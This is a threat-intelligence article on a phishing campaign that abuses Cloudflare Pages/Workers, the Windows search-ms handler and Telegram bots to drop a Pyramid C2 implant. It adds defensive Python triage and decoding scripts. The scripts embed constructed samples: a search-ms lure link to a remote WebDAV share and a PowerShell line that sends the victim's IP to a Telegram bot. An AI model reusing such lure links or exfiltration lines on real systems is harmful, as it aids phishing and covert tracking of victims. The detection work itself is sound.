Russian-Speaking Threat Actor Abuses Cloudflare and Telegram in Multi-Stage Phishing Campaign


A New Wave of Phishing Threats

Cybersecurity researchers have uncovered a multi-stage phishing campaign run by a Russian-speaking threat actor. The attackers abuse Cloudflare’s Pages and Workers services to host phishing sites dressed up as DMCA takedown notices. The pages trick victims into opening what looks like a document but is in fact the first link of an infection chain that ends in a Python implant for Pyramid, an open-source Python-based command-and-control (C2) framework, giving the operators remote control of compromised systems. Telegram is used along the way to report each new victim to the operators.

This discovery highlights how cybercriminals are abusing trusted online services to evade detection and increase the effectiveness of their phishing tactics. Let’s break down how this campaign works and why it poses a significant risk.

How the Phishing Attack Works

1. Hosting Malicious Pages on Cloudflare Services

The attackers use Cloudflare Pages (static site hosting) and Cloudflare Workers (serverless functions run at Cloudflare’s edge). Instead of legitimate content, they host phishing pages on free subdomains of “pages.dev” and “workers.dev”, so every lure link carries a Cloudflare-served URL with valid TLS and a reputation that URL filters rarely question. The pages impersonate a secure document-sharing service and present the visitor with a fake DMCA infringement notice.

2. Abusing the Windows “search-ms” Protocol Handler

The lure page hands the victim a link using the “search-ms” URI scheme, which Windows registers for Explorer’s search feature. Clicking it opens an Explorer search-results window, and because the URI’s location parameter can point at a remote share, the “document” listed in that window is served from attacker-controlled infrastructure rather than from the victim’s machine. What looks like a PDF is actually a Windows shortcut (.lnk) file with a PDF name and icon.

3. Malicious Payload Delivery

When the victim opens the shortcut, it runs a PowerShell script that downloads a ZIP archive mixing legitimate files with malicious ones. Inside the archive is a Python script that connects to the operators’ Pyramid C2 server, giving them remote control of the infected device.

4. Telegram-Based Tracking

What sets this campaign apart is its use of Telegram for victim tracking. The PowerShell script “kozlina2.ps1” embeds hardcoded Telegram bot credentials (the bot token and the chat it posts to). With these, the script sends each infected device’s IP address to a Telegram channel named “ПШ КОД ЗАПУСК” (“PS CODE LAUNCH”).

Several Telegram accounts linked to this activity have been identified:

– @tyyndrabot – The bot that collects and receives victim IP addresses

– @pups2131 – Administrator of the channel

– Skandi – A group member whose role is unclear
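The lure and tracking stages described in steps 2 and 4 can be triaged with the following script. This is an added example, not code from the report, from Cloudflare or from the threat actor. It assumes the search-ms link carries a crumb=location parameter pointing at a remote share (the usual form of this lure) and that the tracker stage posts through the Telegram Bot API; the lure HTML, the hostname dmca-notice-review.pages.dev, the PowerShell fragment and the bot token, chat id and IP address inside it are all constructed for illustration.

```python
"""Triage helpers for the lure and tracking stages of the chain above.

Added example; this is not code from the report, from Cloudflare or from
the threat actor. The lure HTML, the search-ms link and the PowerShell
fragment are constructed stand-ins for the artefacts described, and the
Telegram bot token, chat id and hostnames in them are fake.
"""
import re
from urllib.parse import unquote, urlsplit

# Cloudflare developer-platform suffixes the campaign hosts its lures on.
ABUSED_SUFFIXES = (".pages.dev", ".workers.dev")

SEARCH_MS_LINK_RE = re.compile(r"search-ms:[^\s\"'<>]+", re.I)
# Telegram Bot API token: numeric bot id, a colon, then a 30+ char secret
# (the secret is usually 34-35 characters; the bound is kept loose).
TELEGRAM_TOKEN_RE = re.compile(r"\d{8,10}:[A-Za-z0-9_-]{30,}")
TELEGRAM_API_RE = re.compile(r"https?://api\.telegram\.org/bot[^\s\"'<>]+", re.I)
CHAT_ID_RE = re.compile(r"chat_id\s*[=:]\s*[\"']?(-?\d{5,})", re.I)


def parse_search_ms(uri: str) -> dict:
    """Split a search-ms: URI into its parameters and flag remote crumbs.

    Explorer treats `crumb=location:<path>` as the folder to search; a UNC
    path or URL there makes the "search results" window list files served
    from an attacker-controlled share, which is the trick the lure relies on.
    """
    if not uri.lower().startswith("search-ms:"):
        raise ValueError("not a search-ms URI")
    body = unquote(uri.split(":", 1)[1]).replace("&amp;", "&")
    params = {}
    for part in body.split("&"):
        key, _, value = part.partition("=")
        params.setdefault(key.lower(), []).append(value)
    locations = [
        v.split(":", 1)[1]
        for v in params.get("crumb", [])
        if v.lower().startswith("location:")
    ]
    remote = [
        loc for loc in locations
        if loc.startswith("\\\\") or re.match(r"https?://", loc, re.I)
    ]
    return {
        "query": params.get("query", [""])[0],
        "displayname": params.get("displayname", [""])[0],
        "locations": locations,
        "remote_locations": remote,
        "suspicious": bool(remote),
    }


def triage_lure(page_url: str, html: str) -> dict:
    """Check whether a page sits on pages.dev/workers.dev and whether it
    hands the visitor a search-ms: link that points at a remote location."""
    host = (urlsplit(page_url).hostname or "").lower()
    links = [parse_search_ms(u) for u in SEARCH_MS_LINK_RE.findall(html)]
    return {
        "host": host,
        "abused_platform": host.endswith(ABUSED_SUFFIXES),
        "search_ms_links": links,
        "suspicious": any(link["suspicious"] for link in links),
    }


def find_telegram_tracker(script_text: str) -> dict:
    """Pull hardcoded Telegram bot credentials and Bot API calls out of a
    script such as the PowerShell tracker stage."""
    tokens = sorted(set(TELEGRAM_TOKEN_RE.findall(script_text)))
    api_urls = TELEGRAM_API_RE.findall(script_text)
    return {
        "bot_tokens": tokens,
        "api_urls": api_urls,
        "chat_ids": CHAT_ID_RE.findall(script_text),
        "suspicious": bool(tokens or api_urls),
    }


# --- constructed samples (not the real artefacts) ---------------------------
LURE_URL = "https://dmca-notice-review.pages.dev/index.html"
LURE_HTML = """<p>A DMCA infringement notice has been filed against content you host.</p>
<a href="search-ms:query=DMCA%20Notice&crumb=location:%5C%5C203.0.113.10@80%5CDavWWWRoot&displayname=Downloads">Download the notice</a>
"""
TRACKER_PS1 = r'''
# constructed stand-in for the tracker stage; token and chat id are fake
$token = "1234567890:AAEfakeTokenForIllustration0123456789ab"
$ip = (Invoke-RestMethod -Uri "https://api.ipify.org").Trim()
Invoke-RestMethod -Uri "https://api.telegram.org/bot$token/sendMessage" -Method Post `
    -Body @{chat_id="-1001234567890"; text="new host: $ip"}
'''

if __name__ == "__main__":
    print(triage_lure(LURE_URL, LURE_HTML))
    print(find_telegram_tracker(TRACKER_PS1))
```

The search-ms parser is the part worth reusing: a `location:` crumb that starts with `\\` or `http` is the signature of this lure regardless of which hosting platform serves the page, while the token and chat-id patterns are cheap to run over any script dropped by an untrusted shortcut.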

5. Advancements in Obfuscation

The actor is iterating on its tooling. The latest version of the Python script “kursor.py” pads its configuration strings with junk characters that have to be stripped before the strings can be decoded, which adds a little friction to static analysis and breaks naive string-based signatures. This is not a groundbreaking evasion technique, but it shows ongoing effort to stay ahead of detection.
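A decoder for configuration strings padded in the way just described, as an added example. This is not the actor’s script or the researchers’ code: the real kursor.py configuration is not reproduced here, the junk characters, the “pyramid” sample and the JSON config with the hostname updates.example.invalid are constructed, and the code assumes the underlying encoding is base64 with junk inserted between the encoded characters (the report says only that junk is added before decoding).

```python
"""Decode a junk-padded configuration string of the kind described above.

Added example, not the actor's script or the researchers' code. Assumes
the configuration is base64 with non-alphabet junk characters inserted;
every sample string below is constructed for illustration.
"""
import base64
import binascii
import json
import re
import string

B64_ALPHABET = set(string.ascii_letters + string.digits + "+/")


def strip_junk(blob: str) -> str:
    """Drop every character outside the base64 alphabet. Existing '='
    padding is dropped too and rebuilt later, since junk may sit between
    the data and its padding."""
    return "".join(ch for ch in blob if ch in B64_ALPHABET)


def decode_junked_base64(blob: str) -> bytes:
    """Strip junk, repair padding and decode. Raises ValueError when what
    is left is not base64, so a caller can tell 'not this scheme' apart
    from 'decoded to garbage'."""
    clean = strip_junk(blob)
    if not clean:
        raise ValueError("nothing left after removing junk")
    clean += "=" * (-len(clean) % 4)
    try:
        return base64.b64decode(clean, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"not base64 after cleaning: {exc}") from exc


def extract_c2_config(blob: str) -> dict:
    """Decode the string and pull out any C2 URLs, whether the payload is
    a JSON object or just a bare URL."""
    text = decode_junked_base64(blob).decode("utf-8", errors="replace")
    try:
        cfg = json.loads(text)
    except json.JSONDecodeError:
        cfg = {"raw": text}
    if not isinstance(cfg, dict):
        cfg = {"raw": cfg}
    cfg["c2_urls"] = re.findall(r"https?://[^\s\"'<>]+", text)
    return cfg


def inject_junk(clean_b64: str, junk: str = "#!@$%^*", every: int = 3) -> str:
    """Build a constructed sample in the style described: one junk
    character after every `every` base64 characters. Used only to
    produce test data; the real script's padding scheme is not known."""
    out = []
    for i, ch in enumerate(clean_b64, 1):
        out.append(ch)
        if i % every == 0:
            out.append(junk[(i // every) % len(junk)])
    return "".join(out)


# --- constructed samples ---------------------------------------------------
# "c#Hl@y!YW%1p^Z&A=*=" is base64("pyramid") with junk interleaved.
JUNKED_WORD = "c#Hl@y!YW%1p^Z&A=*="
SAMPLE_CONFIG = {"c2": "https://updates.example.invalid:443/", "sleep": 30, "jitter": 10}
JUNKED_CONFIG = inject_junk(base64.b64encode(json.dumps(SAMPLE_CONFIG).encode()).decode())

if __name__ == "__main__":
    print(decode_junked_base64(JUNKED_WORD))
    print(extract_c2_config(JUNKED_CONFIG))
```

Rebuilding the padding after stripping is what makes this robust: the actor can sprinkle junk anywhere, including around the trailing `=`, and the decoder still recovers the original bytes, while a validation failure tells the analyst that the string uses some other scheme rather than silently returning garbage.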

6. Abuse of Trusted Services

This campaign highlights the growing misuse of platforms like Cloudflare and Telegram by cybercriminals. Hosting the lure on a well-known, TLS-enabled domain and reporting victims over a mainstream messaging API lets the early stages of the attack blend in with ordinary traffic, which makes both detection and blocking harder for security teams.

What Undercode Says:

The recent phishing attack exposes several alarming cybersecurity trends. Let’s analyze the key takeaways and implications of this campaign:

1. Weaponizing Legitimate Services

Cloudflare and Telegram are not inherently malicious platforms, but attackers keep turning them into free, reputable infrastructure. This is a real problem for defenders, because blocking these platforms outright is not practical for businesses and individuals who rely on them. Instead, organisations should log and alert on traffic to pages.dev, workers.dev and api.telegram.org from endpoints that have no business reason to reach them, and treat a “search-ms:” link in email or web content as a phishing indicator in its own right.

2. The Growing Role of Telegram in Cybercrime

Telegram has become a favourite command-and-control and exfiltration channel for cybercriminals. A bot takes minutes to create, needs no infrastructure of the attacker’s own, and its Bot API traffic to api.telegram.org rides on ordinary HTTPS, so it blends in with legitimate use. In this case the bot does nothing more than record infected devices, but the same channel could just as easily carry tasking. Security teams should watch how messaging apps are used on their endpoints, not just whether they are used.

3. The “search-ms” Protocol as an Attack Vector

The “search-ms” handler is one of many URI schemes registered in Windows (under HKEY_CLASSES_ROOT\search-ms) that most organisations neither monitor nor restrict, so a link that drops the victim into an attacker-controlled share goes unnoticed by controls tuned for attachments and executables. Administrators should inventory the protocol handlers registered on their endpoints, remove or restrict those with no business use through Group Policy or the registry, and alert when Explorer or PowerShell is launched from a “search-ms:” URI.

4. The Evolving Landscape of Phishing Attacks

Phishing is no longer just about deceptive emails. Attackers are now incorporating multi-stage infection chains, advanced obfuscation techniques, and trusted third-party services to increase the success rate of their campaigns. This emphasizes the need for:

– User awareness training to recognize phishing attempts

– Endpoint detection and response (EDR) solutions to catch suspicious scripts

– Regular security assessments to identify and patch vulnerabilities

5. The Future of Cybersecurity Defense

As attackers refine their tactics, cybersecurity strategies must also evolve. Threat intelligence sharing, real-time monitoring, and AI-driven analysis will be crucial in identifying and stopping such advanced threats. Organizations should:

– Keep software and security tools updated

– Implement zero-trust security models

– Stay informed on the latest phishing tactics

By proactively adapting to emerging threats, businesses and individuals can reduce the risk of falling victim to sophisticated cyberattacks.

Fact Checker Results:

✅ Cloudflare’s Pages and Workers services are legitimate but are being abused by cybercriminals – Attackers are misusing these trusted platforms to host phishing pages, making detection harder.

✅ Telegram is increasingly being used for cybercrime operations – The messaging platform’s free bot API has become a go-to for attackers, particularly for tracking victims and managing phishing campaigns.

✅ The “search-ms” protocol can be exploited for malware delivery – This attack highlights the risks of unmonitored protocol handlers, suggesting organizations should consider restricting their use.

Cybersecurity threats are constantly evolving, and this phishing campaign is a clear example of how attackers are adapting their methods to evade detection. Stay alert, update your security protocols, and educate yourself on the latest cyber risks. Phishing is no longer just an email problem—it’s a multi-platform battle.

References:

Reported By: https://cyberpress.org/cloudflare-abused-by-hackers/